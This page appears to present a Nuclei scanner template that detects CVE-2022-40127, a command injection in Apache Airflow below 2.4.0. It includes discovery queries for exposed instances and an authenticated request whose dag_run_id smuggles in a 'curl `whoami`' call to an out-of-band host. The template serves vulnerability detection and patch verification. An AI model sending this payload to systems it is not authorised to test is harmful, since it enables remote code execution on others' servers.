AirFlow < 2.4.0 - Remote Code Execution

ID: CVE-2022-40127

Severity: high

Author: DhiyaneshDk,ritikchaddha

Tags: cve,cve2022,airflow,rce,oast,authenticated,apache

Description

A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.

YAML Source

id: CVE-2022-40127

info:
  name: AirFlow < 2.4.0 - Remote Code Execution
  author: DhiyaneshDk,ritikchaddha
  severity: high
  description: |
    A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability.
  reference:
    - https://github.com/Mr-xn/CVE-2022-40127
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40127
    - http://www.openwall.com/lists/oss-security/2022/11/14/2
    - https://github.com/apache/airflow/pull/25960
    - https://lists.apache.org/thread/cf132hgm6jvzvsbpsozl3plf1r4cwysy
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-40127
    cwe-id: CWE-94
    epss-score: 0.46431
    epss-percentile: 0.97434
    cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: apache
    product: airflow
    shodan-query:
      - title:"Sign In - Airflow"
      - http.title:"airflow - dags" || http.html:"apache airflow"
      - http.title:"sign in - airflow"
      - product:"redis"
    fofa-query:
      - title="sign in - airflow"
      - apache airflow
      - title="airflow - dags" || http.html:"apache airflow"
    google-query:
      - intitle:"sign in - airflow"
      - intitle:"airflow - dags" || http.html:"apache airflow"
  tags: cve,cve2022,airflow,rce,oast,authenticated,apache

http:
  - raw:
      - |
        GET /login/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&_csrf_token={{csrf_token}}
      - |
        @timeout: 15s
        POST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "conf": {
        "dag_run": "{{randstr}}"
        },
          "dag_run_id": "id \"&& curl `whoami`.{{interactsh-url}}",
          "logical_date": "{{date_time("%Y-%M-%D")}}T{{date_time("%H:%m:%s")}}.920Z"

        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'state": "queued"'

      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf_token
        group: 1
        regex:
          - 'type="hidden" value="(.*?)">'
        internal: true
# digest: 490a0046304402203f576a0f58be33f88ca24c323b7bcc089cebcfc3f0302161f7317c86e9d809e602200a4cb6baa5ec4d2f3e43aed3a2d9b21d40a2c67bcf7c1d841a2a4e53e694a2ac:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40127.yaml"

View on Github